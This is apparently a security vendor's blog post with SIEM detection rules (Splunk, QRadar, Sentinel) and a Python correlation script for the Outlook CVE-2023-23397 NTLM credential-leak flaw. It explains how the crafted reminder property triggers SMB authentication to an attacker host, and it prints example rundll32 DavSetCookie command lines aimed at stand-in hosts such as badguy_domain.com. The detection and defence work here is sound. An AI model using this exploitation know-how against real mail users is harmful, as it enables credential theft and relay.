URL: https://cardinalops.com/blog/detecting-microsoft-outlook-vulnerability-cve-2023-23397-splunk-ibm-qradar/
March 20, 2023 | Tamir Oren Bar-Hai

DETECTING MICROSOFT OUTLOOK VULNERABILITY CVE-2023-23397 IN SPLUNK, IBM QRADAR & MICROSOFT SENTINEL


SUMMARY

Discovered by the Ukrainian CERT and attributed to APT28 (aka Fancy Bear or
Strontium, the Russian GRU threat actor), CVE-2023-23397 is being actively
exploited in targeted attacks against government, transportation, energy, and
military sectors in Europe. 

With a CVSS rating of 9.8 – due to its elevation of privileges and ease of
exploitation – it affects all versions of Outlook for Windows and is
particularly serious because it steals credentials before the user has even
opened a specially-crafted email. 

Attackers can then use the stolen credential to move laterally within the
network in order to gather more information and compromise crown-jewel assets. 

It’s also interesting that this attack is a variation of pass-the-hash (PtH)
which has been around since the late 90s.

This blog post includes detection rules for Splunk, IBM QRadar, and Microsoft
Sentinel as well as a detailed technical description of the vulnerability and
how it can be exploited.

If you’re currently using the CardinalOps detection posture management platform,
these rules are now being delivered to your portals. 

As usual, the rules delivered to CardinalOps users are auto-customized to your
environment (indexes, naming conventions, etc.). This enables you to quickly
review, automatically test, and push them to your SIEM – via its native API –
from the CardinalOps platform.

This blog post describes:

 * Relevant MITRE techniques for CVE-2023-23397
 * Splunk, IBM QRadar, and Sentinel detections for CVE-2023-23397
 * How CVE-2023-23397 works
 * Technical details for CVE-2023-23397
 * How to detect CVE-2023-23397
 * Other mitigations for CVE-2023-23397


RELEVANT MITRE TECHNIQUES FOR CVE-2023-23397

Exploitation for Privilege Escalation (T1068)

Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay (T1557.001)

Forced Authentication (T1187)

Exploitation for Credential Access (T1212)

Post-Exploitation

OS Credential Dumping: LSASS Memory (T1003.001)

Use Alternate Authentication Material (T1550)


DETECTIONS FOR MICROSOFT OUTLOOK VULNERABILITY (CVE-2023-23397)

These rules alert when rundll32.exe uses WebDAV (davclnt.dll) to access a public IP
address and, in the same time range, an outbound NTLM authentication event is
logged with that same public IP address as the destination.


SPLUNK DETECTION RULES FOR MICROSOFT OUTLOOK VULNERABILITY (CVE-2023-23397)

index={your_index} sourcetype={your_4688_sourcetype} EventCode=4688
    New_Process_Name="*rundll32.exe*" Process_Command_Line="*davclnt.dll*"
    Process_Command_Line="*DavSetCookie*" "davclnt" "rundll32" "DavSetCookie"
| rex field=Process_Command_Line
    "DavSetCookie\s+(?:\S+\s+)?(?:http://)?(?<IP_Address>((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))"
| eval isLocal=if(cidrmatch("192.168.0.0/16", IP_Address) OR cidrmatch("10.0.0.0/8", IP_Address) OR cidrmatch("172.16.0.0/12", IP_Address), "True", "False")
| search isLocal="False" AND IP_Address=*

 

index={your_index} sourcetype={your_NTLM_audit_sourcetype} EventCode=8001
| rex "\w+/(?<IP_Address>((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))"
| eval isLocal=if(cidrmatch("192.168.0.0/16", IP_Address) OR cidrmatch("10.0.0.0/8", IP_Address) OR cidrmatch("172.16.0.0/12", IP_Address), "True", "False")
| search isLocal="False"



SPLUNK CORRELATION SEARCH FOR MICROSOFT OUTLOOK VULNERABILITY (CVE-2023-23397)

search (index={your_index} sourcetype={your_NTLM_audit_sourcetype} EventCode=8001)
    OR (index={your_index} sourcetype={your_4688_sourcetype} EventCode=4688
        New_Process_Name="*rundll32.exe*" Process_Command_Line="*davclnt.dll*"
        Process_Command_Line="*DavSetCookie*" "davclnt" "rundll32" "DavSetCookie")
| rex field=Process_Command_Line
    "DavSetCookie\s+(?:\S+\s+)?(?:http://)?(?<IP_Address_4688>((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))"
| rex "\w+/(?<IP_Address_8001>((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))"
| eval IP_Address=case(EventCode==4688, 'IP_Address_4688', EventCode==8001, 'IP_Address_8001')
| eval isLocal=if(cidrmatch("192.168.0.0/16", IP_Address) OR cidrmatch("10.0.0.0/8", IP_Address) OR cidrmatch("172.16.0.0/12", IP_Address), "True", "False")
| search isLocal="False"
| stats dc(EventCode) as EventCode_count count by IP_Address
| where EventCode_count > 1

Note: Time range can be set using the Splunk search console.


IBM QRADAR DETECTION RULE FOR MICROSOFT OUTLOOK VULNERABILITY (CVE-2023-23397)

and when the event(s) were detected by one or more of Microsoft Windows Security
Event Log

and when the event matches EventID (custom) is any of 4688

and when the event matches ProcessName (custom) is any of rundll32.exe

and when the event matches Process CommandLine (custom) contains any of
davclnt.dll

and when the event matches Process CommandLine (custom) matches any of
expressions ((?:1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|[1-9])(?:\.(?!$)|$)){4}


MICROSOFT SENTINEL QUERY FOR MICROSOFT OUTLOOK VULNERABILITY (CVE-2023-23397)
WHICH COVERS BOTH WINDOWS LOGS AND DEFENDER LOGS

(union isfuzzy=true
(
DeviceProcessEvents
| where ProcessCommandLine has_all ("davclnt.dll", "DavSetCookie") and FileName =~ "rundll32.exe"
| extend IPaddress = extract(@"((\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3}))", 1, ProcessCommandLine)
| where isnotempty(IPaddress)
| project-reorder DeviceName, AccountName, AccountUpn, FolderPath, ProcessCommandLine, InitiatingProcessFolderPath, InitiatingProcessCommandLine, TimeGenerated
),
(
SecurityEvent
| where EventID == 4688 and Process =~ "rundll32.exe" and CommandLine has_all ("davclnt.dll", "DavSetCookie")
| extend IPaddress = extract(@"((\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3}))", 1, CommandLine)
| where isnotempty(IPaddress)
| extend DeviceName=Computer
| project-reorder DeviceName, NewProcessName, IPaddress, CommandLine, Account, TargetAccount, TimeGenerated
)
)


HOW CVE-2023-23397 WORKS

On March 14th, 2023, Microsoft patched a serious vulnerability affecting
Microsoft Outlook.

This vulnerability has existed in multiple versions for more than a decade. The
affected versions are Outlook for Windows 2013 up to 2019 including the
Microsoft 365 (Office 365) versions. Older versions could also be vulnerable but
are not tested or supported. 

TL;DR – An adversary sending an email with the affected properties triggers an
outbound SMB connection, causing your machine to send out your NTLM hash (an
encrypted form of your password, along with your username in clear text).

This is not to be confused with the NT hash, which is the one used in
Pass-the-Hash (PtH) attacks. The NTLM hash sent here contains an encrypted form
of your password, and the adversary has to brute-force it before obtaining your
clear-text password.

The time for the bruteforce attack to succeed is dependent on your password
length and complexity (can range from seconds to years).

Of course, there are other methods that can speed up the guessing process (e.g.,
Hashcat permutations), so we need to act quickly to prevent and detect
exploitation attempts against this vulnerability.

Another approach to exploit this vulnerability is to relay the NTLM packets to a
target server or workstation.

Think of an IT admin using an unpatched Outlook version, causing their machine
to send out an NTLM packet. This packet is captured by the adversary and relayed
to another machine on the network, say that of the HR or Finance department head
(or someone in DevOps). That machine has now accepted the IT admin's credentials
for a login, and any command can then be executed by the adversary on behalf of
the IT admin.

See also: Getting Creds via NTLMv2 (0xdf hacks stuff).

Of course, for this to occur the adversary needs to have established a foothold
on your network, unless you allow outbound and inbound SMB traffic from the
internet (we never allow that, right?).

To summarize, we have two outcomes from the exploitation of this Outlook
vulnerability: A possible password compromise and access to remote machines. 


 


TECHNICAL DETAILS FOR CVE-2023-23397

Let’s dive into more details:

 * The Outlook client automatically parses and executes crafted messages
   containing attributes that control the MAPI properties used to set the
   “reminder notification” sound file location.
 * The processing is performed silently, without any indication to the end user.
 * The crafted message can be a shared Outlook task or a calendar invite.
 * The specific MAPI properties are PidLidReminderFileParameter and
   PidLidReminderOverride.
 * Once these properties are set and PidLidReminderFileParameter points to an
   adversary-controlled machine: this is the culprit, and the reason we are
   reading this article.

The processing of the path to the reminder sound file location is mostly
triggered by Exchange based systems (on-prem and cloud).

Even Hotmail seems to do the same. Will Dormann on Twitter: “So, all of this
wondering about how to send a “rich” calendar invite over SMTP is moot. The
actual exploit for CVE-2023-23397 is an IPM.Task item with 0x851F
(PidLidReminderFileParameter) set. This is just fine as a TNEF attachment over
SMTP. https://t.co/yGSiR4B6wh https://t.co/7GIvb6zGlA”

Once the Outlook client is able to process the malformed mail item, the outbound
SMB packet is sent, without any notification or user interaction. 

It seems that even after applying the patch, Microsoft still allows the reminder
sound file to be loaded by pointing to a hostname. This can be leveraged
internally on the network, or used to reach a public IP if the hosts file is
manipulated.

Another nice “feature” of this vulnerability is the ability to trigger legacy
capabilities in Windows that, if not managed, can leak credentials. For example,
by using a non-existent host name in the reminder file path, the adversary can
cause LLMNR and NBT-NS broadcast and multicast requests. See
https://attack.mitre.org/techniques/T1557/001/ for details.


 


HOW TO DETECT CVE-2023-23397

The process command line on the victim’s machine has the following format:

rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie [ip address or domain name] http://[ip address or domain name]/[path to a file or directory]

For example:

rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie 35.180.139.74 http://35.180.139.74/file/sound.wav

rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie badguy http://badguy_domain.com/file/sound.wav

The format can also appear in a shorter form, without the separate host argument:

rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie http://35.180.139.74/file/sound.wav

rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie http://badguy_domain.com/file/sound.wav

Even though the command line states the http scheme, the Windows machine sends
an SMB packet on port 445.

We need to detect when the DavSetCookie function accesses a public IP address.
This can be normal for a home PC but is questionable for an enterprise machine.
This detection will also surface the public IP addresses your enterprise clients
legitimately use; anything other than that known-good set should trigger a
deeper investigation.

While on the topic of identifying DLL functions, remember to also have detections
for a DLL function invoked by its ordinal value. In this case (not tested, but
this typically works), the command could be:

rundll32 c:\windows\system32\davclnt.dll,#6 35.180.139.74 http://35.180.139.74/share

For more details, see:

https://research.splunk.com/endpoint/6c135f8d-5e60-454e-80b7-c56eed739833/
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md#atomic-test-11—rundll32-with-ordinal-value

https://github.com/elceef/yara-rulz (Outlook_CVE_2023_23397.yara)
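As an added example (not part of the original post or of CardinalOps' rules), the following Python implements the same logic as the Splunk correlation search above over raw log text: it pulls the target IP out of the DavSetCookie command-line formats listed in this section (long, short and ordinal #6 forms), discards private addresses the way the cidrmatch() filters do, and reports IPs that also appear as the target of an outbound NTLM audit event 8001 within a time window. The sample events, including the 8001 "Target server: cifs/<ip>" text, are constructed for this example and are assumed to be the shape of the fields you would feed in.

```python
import ipaddress
import re
from datetime import datetime, timedelta

# rundll32 davclnt.dll,DavSetCookie (or its ordinal, #6) in the long or short form
# shown above; the target IP is read from the http:// URL argument.
DAV_RE = re.compile(
    r"rundll32(?:\.exe)?\s+\S*davclnt\.dll,(?:DavSetCookie|#6)\s+"
    r"(?:\S+\s+)?https?://(?P<ip>\d{1,3}(?:\.\d{1,3}){3})(?:[/:]|$)", re.I)
# NTLM audit event 8001 names its target as <service>/<host>, e.g. cifs/35.180.139.74
NTLM_RE = re.compile(r"\b\w+/(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\b")

def public_ip_or_none(ip_str):
    """Like the cidrmatch() filter in the Splunk rules: drop RFC1918 and other non-global IPs."""
    try:
        return ip_str if ipaddress.ip_address(ip_str).is_global else None
    except ValueError:
        return None

def extract_dav_target(command_line):
    """Public IP a DavSetCookie command line points at, or None."""
    m = DAV_RE.search(command_line)
    return public_ip_or_none(m.group("ip")) if m else None

def extract_ntlm_target(event_text):
    """Public IP named as the target server in an 8001 event, or None."""
    m = NTLM_RE.search(event_text)
    return public_ip_or_none(m.group("ip")) if m else None

def correlate(events, window=timedelta(minutes=10)):
    """events: (timestamp, event_id, text). Return public IPs seen in both a 4688
    DavSetCookie command line and an 8001 outbound NTLM audit within `window`."""
    dav = [(ts, extract_dav_target(txt)) for ts, eid, txt in events if eid == 4688]
    ntlm = [(ts, extract_ntlm_target(txt)) for ts, eid, txt in events if eid == 8001]
    return {ip for t1, ip in dav if ip
            for t2, ip2 in ntlm if ip2 == ip and abs(t1 - t2) <= window}

# Constructed sample events (not real telemetry): one pair to a public IP, as in
# the exploitation case, plus a benign short-form WebDAV access to an internal host.
T0 = datetime(2023, 3, 15, 9, 0, 0)
SAMPLE_EVENTS = [
    (T0, 4688, r"rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie "
               r"35.180.139.74 http://35.180.139.74/file/sound.wav"),
    (T0 + timedelta(seconds=2), 8001, "Target server: cifs/35.180.139.74"),
    (T0 + timedelta(minutes=1), 4688,
     r"rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie http://10.20.30.40/share"),
]

def run_sample():
    return correlate(SAMPLE_EVENTS)  # -> {"35.180.139.74"}
```

Hostname targets (the badguy_domain.com form) are deliberately not extracted here, matching the IP-only scope of the rules above; widen DAV_RE if you also want to review hostnames.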

Another powerful detection source can be leveraged by enabling “Outbound NTLM
traffic to remote servers” in the security options. This enables the audit of
outbound NTLM authentication traffic so you can identify where your desktops and
servers are sending their NTLM hashes. 

Example event log:

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-DUR-001_pic2.png
https://www.windows-security.org/c526612a90004088b250158bc5e7dc2d/network-security-restrict-ntlm-outgoing-ntlm-traffic-to-remote


 


OTHER MITIGATIONS FOR CVE-2023-23397

Microsoft suggests blocking outbound port 445 and making use of the Protected
Users Active Directory group. This is good advice, except that “Protected Users”
is usually not a good fit for the standard user. Test wisely.

We suggest also reviewing your security posture to make sure other vectors are
not making it easy for the adversary.  

 1. Ensure your machines are configured to send out only NTLMv2 and not one of
    the weaker options. Specifically, configure “Send NTLMv2 responses only.
    Refuse LM & NTLM.” For more information see
    https://learn.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-lan-manager-authentication-level
 2. The fact that any Outlook user can be triggered to send their NTLM hash to
    any destination can affect home users (think the C-level or IT admins). Even
    if the adversary cracks the NTLM hash, they still need to get lucky and find
    an interface without MFA. So make sure your home users use MFA for any
    interface they use from their home PC!
 3. To mitigate the NTLM relay attack vector, ensure SMB server signing is
    enabled on workstations and servers. Configure workstations to block inbound
    SMB (port 445) and add exceptions only for the specific machines allowed to
    access workstations over the network on port 445.
